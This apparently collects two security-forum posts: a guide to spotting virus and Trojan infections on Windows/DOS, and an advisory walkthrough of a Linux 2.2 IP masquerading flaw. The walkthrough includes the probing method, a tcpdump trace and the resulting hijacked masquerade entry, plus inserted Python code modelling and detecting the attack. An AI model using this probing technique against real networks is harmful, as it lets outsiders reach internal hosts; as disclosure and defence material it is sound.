β β β ο½ππ»βΊπ«Δπ¬πβ β β β
FIX YOUR PC INFECTED
1. Scanning method of anti-virus software
This is probably the first choice for most of our friends, and I am afraid that for many it is the only choice. Nowadays there are more and more types of viruses, and their methods of concealment are becoming more and more clever, which poses a real challenge to anti-virus software developers.
2. Observation method
This method can only be applied accurately when you understand the symptoms of virus outbreaks and where viruses usually reside. Typical symptoms: the machine often crashes while booting from the hard disk, the system takes a long time to boot, programs run very slowly, the hard disk cannot be accessed, and unusual sounds or prompts appear. When such failures occur, a virus should be the first thing we consider, but do not jump to that conclusion: software and hardware failures, which I do not cover here, can produce the same symptoms! For failures caused by viruses, we can observe from the following aspects:
a. Memory observation method
This method is generally used for viruses found under DOS. We can use the "mem /c /p" command under DOS to check the memory used by each program and find the memory occupied by a virus (generally it is not listed separately but is attached to another program). The memory occupied by some viruses is also well hidden: you cannot find it with "mem /c /p", but you can see that the total base memory reported is 1 KB or a few KB less than 640 KB.
b. Registry observation method
This kind of method generally applies to the so-called hacker programs that have appeared recently, such as Trojan horse programs. These viruses generally modify the registry so that they are activated, started or loaded automatically. Generally they are implemented in the following places:
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion
etc. For details, please refer to my other article, "Troubleshooting Trojans", which analyses the possible registry locations in more detail.
c. System configuration file observation method
This type of method is also generally suited to hacker programs. Such viruses are generally hidden in system.ini, win.ini (Win9x/WinME) and the startup group. There is a "shell=" item in the system.ini file, and "load=" and "run=" items in the win.ini file; these viruses generally load their own programs through these items. Note that sometimes the original program named there is modified instead. We can run the msconfig.exe program in Win9x/WinME to check these one by one. For details, please refer to my article "Troubleshooting Trojan Horses".
d. Character string observation method
This method is mainly aimed at some special viruses. When these viruses infect a file, they write a corresponding signature string into it. For example, the CIH virus writes a string like "CIH" into the infected file. Of course, this cannot be found easily; we can use a hexadecimal editor to open the main system files (such as Explorer.exe) and search for such strings. It is better to back up before editing, since these are the main system files.
e. Hard disk space observation method
Some viruses do not damage your system files but only generate a hidden file. This file generally has little content but takes up a lot of hard disk space; sometimes it is so large that your hard disk no longer has room to run ordinary programs, yet you cannot see it. In that case we have to open Explorer (the resource manager) and set the folder view options so that all files, including hidden ones, are shown ...
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Linux kernel IP masquerading has security holes:
t.me/UndercodeTesting
1) There are serious security vulnerabilities in the IP masquerading implementation of the Linux 2.2.x kernel. The relevant kernel code lacks a proper check of the connection, so an attacker can rewrite a UDP masquerade entry in the kernel and have his UDP packets routed to an internal machine.
2) When an internal host accesses a DNS server on the external network, the UDP packet it sends passes through the IP masquerading gateway, and the kernel adds an entry recording the connection. For example, take a UDP packet sent from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the masquerading gateway (B) and its source port with a port from the masquerade range, by default 61000 to 65096, so in theory the kernel can handle 4096 TCP/UDP masqueraded connections at the same time.
> Host A:1035 -> GW B:63767 -> Host C:53
HOW IT WORKS?
When an external host sends a UDP packet to the masquerading gateway, Linux IP masquerading decides whether the packet should be forwarded to the internal network based on the destination port only. If the destination port has a corresponding entry in the masquerade connection table, the remote host IP and port of that entry are updated from the source IP and source port of this packet. So as long as the attacker guesses a masquerade port on the gateway, he can rewrite the masquerade connection table with his own IP and port. The port range the gateway uses for masqueraded connections is usually 61000 to 65096, so it is easy for an external attacker to determine which of these ports are in use. An attacker can send UDP probe packets to these ports of the masquerading gateway and then check the IP ID of the ICMP response for each port. Each time a host sends a packet, the IP ID in its TCP/IP stack increases by one, so the ICMP response for a port that is in use for IP masquerading carries the IP ID of the internal host.
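As an added illustration (not code from the post or from the kernel), the following Python model replays the table lookup described above and the exploit walkthrough below with the page's own addresses and ports: strict=False behaves as the page describes (match on the masquerade port only, then overwrite the remote endpoint), while strict=True is an assumed hardened lookup that also matches the packet's source against the recorded remote endpoint. The class and function names are mine; the entry layout follows the ipchains output on the page without the timeout column.

```python
from dataclasses import dataclass

MASQ_PORT_LOW, MASQ_PORT_HIGH = 61000, 65096  # default 2.2.x masquerade port range


@dataclass
class MasqEntry:
    """One masquerade-table row, in the `ipchains -L -M -n` layout (timeout omitted)."""
    proto: str
    int_ip: str
    int_port: int
    masq_port: int
    rem_ip: str
    rem_port: int

    def __str__(self):
        return (f"{self.proto} {self.int_ip} {self.rem_ip} "
                f"{self.int_port} ({self.masq_port}) -> {self.rem_port}")


class MasqTable:
    """strict=False models the 2.2.x lookup the page describes (match on the masquerade
    port only, then overwrite the remote endpoint); strict=True is an assumed fix that
    additionally requires the packet's source to equal the recorded remote endpoint."""

    def __init__(self, strict):
        self.strict = strict
        self.entries = {}             # masquerade port -> MasqEntry
        self.next_port = MASQ_PORT_LOW

    def outbound(self, proto, src_ip, src_port, dst_ip, dst_port):
        """Internal host sends outward: allocate a masquerade port and record the peer."""
        port, self.next_port = self.next_port, self.next_port + 1
        self.entries[port] = MasqEntry(proto, src_ip, src_port, port, dst_ip, dst_port)
        return port

    def inbound(self, proto, src_ip, src_port, dst_port):
        """External packet reaches the gateway: returns (internal ip, port) if forwarded
        inward, or None if the gateway itself answers with ICMP port unreachable."""
        entry = self.entries.get(dst_port)
        if entry is None or entry.proto != proto:
            return None
        if self.strict and (src_ip, src_port) != (entry.rem_ip, entry.rem_port):
            return None
        entry.rem_ip, entry.rem_port = src_ip, src_port   # the rewrite the page describes
        return entry.int_ip, entry.int_port


def scenario(strict):
    """Replay the page's scenario; returns (legit reply forwarded, probe forwarded, entry)."""
    table = MasqTable(strict)
    table.next_port = 63767                   # masquerade port shown on the page
    table.outbound("UDP", "192.168.1.100", 1035, "10.0.0.25", 53)
    legit = table.inbound("UDP", "10.0.0.25", 53, 63767)        # genuine DNS answer
    probe = table.inbound("UDP", "10.10.187.13", 12345, 63767)  # attacker's probe
    return legit, probe, str(table.entries[63767])
```

In the vulnerable mode the probe is forwarded to 192.168.1.100:1035 and the entry now points at 10.10.187.13:12345; in strict mode the genuine DNS answer still passes but the probe is dropped and the entry is unchanged.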
EXPLOITING: This ID will usually differ greatly from the current IP ID of the gateway host, usually by more than 1000. The following example shows the process of exploiting the weakness:
Host A is an internal host (192.168.1.100)
Host B is the masquerading gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25)
Host X is the external attacker (10.10.187.13)
Before probing, execute the following command on the masquerading gateway to display the current masquerade connection table:
ipchains -L -M -n
> UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53
This is a connection from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25; the masquerade port is 63767.
[Result of tcpdump on the attacker's machine]
(To make the problem easier to see, the source port of all probe packets is set to 12345)
[Probing starts from port 61000; some of the earlier results are omitted]
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id 23069)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id 23070)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id 23071)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id 23083)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205)
The IP ID of the above packet is 17205; its difference from 13139 exceeds 4000, which means we have found a masqueraded connection!
10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id 13142)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23092)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[Probing ends at port 65096; some of the results are omitted]
Now let's check the masquerade connection table on the masquerading gateway:
ipchains -L -M -n
> UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345
You can see that the remote host has been replaced by the attacker's IP, 10.10.187.13, and the remote port has been replaced by the source port the attacker used for probing: 12345.
Now the attacker can send UDP data from source port 12345 to port 1035 of the internal host.
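As an added example (not from the original post), a small Python detector for the gateway side: it reads tcpdump lines in the format of the trace above and flags the two things a defender would want to see, an external source sweeping the masquerade port range, and a port-unreachable reply whose TTL and IP ID break the gateway's own sequence, i.e. one generated by the internal host because the probe was forwarded through the masquerade entry. The sample lines are constructed after the page's trace, and the thresholds and function name are assumptions.

```python
import re
from collections import defaultdict

MASQ_PORTS = range(61000, 65097)  # default 2.2.x masquerade port range, inclusive
SWEEP_MIN_PORTS = 4               # assumed: distinct masquerade ports probed by one source
ID_JUMP = 1000                    # IP ID gap that no longer fits the gateway's own counter

# Constructed sample in the format of the page's tcpdump trace (not a real capture)
SAMPLE = """\
10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id 23070)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id 23071)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id 23083)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205)
10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.0.0.25.53 > 10.0.0.1.63767: udp 48 (DF) [tos 0x0] (ttl 60, id 4242)
"""

UDP_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): udp \d+")
ICMP_RE = re.compile(r"^(\S+) > (\S+): icmp: \S+ udp port (\d+) unreachable .*\(ttl (\d+), id (\d+)\)")


def analyse(capture, gateway_ip):
    """Return (sweeps, forwarded): sources that swept the masquerade range, and masquerade
    ports whose 'port unreachable' reply was evidently generated behind the gateway."""
    probed = defaultdict(set)
    forwarded = []
    base_ttl = base_id = None            # the gateway's own TTL and running IP ID
    for line in capture.splitlines():
        m = UDP_RE.match(line)
        if m and m.group(3) == gateway_ip and int(m.group(4)) in MASQ_PORTS:
            probed[m.group(1)].add(int(m.group(4)))
            continue
        m = ICMP_RE.match(line)
        if not m or m.group(1) != gateway_ip:
            continue
        port, ttl, ipid = (int(g) for g in m.group(3, 4, 5))
        if base_id is not None and (ttl != base_ttl or abs(ipid - base_id) > ID_JUMP):
            forwarded.append(port)       # answered by the internal host: the probe went through
            continue
        base_ttl, base_id = ttl, ipid    # gateway-generated reply: advance the baseline
    sweeps = {ip: sorted(p) for ip, p in probed.items() if len(p) >= SWEEP_MIN_PORTS}
    return sweeps, forwarded
```

On the sample, 10.10.187.13 is reported as sweeping five masquerade ports and 63767 as the port whose reply came from behind the gateway; the genuine DNS answer from 10.0.0.25 touches only one port and is not flagged.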
--------------------------------------------------------------------------------
Suggestion:
For the problem of accessing external DNS, a possible solution is to run a caching domain name server on the masquerading gateway and then disable masquerading of UDP packets.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β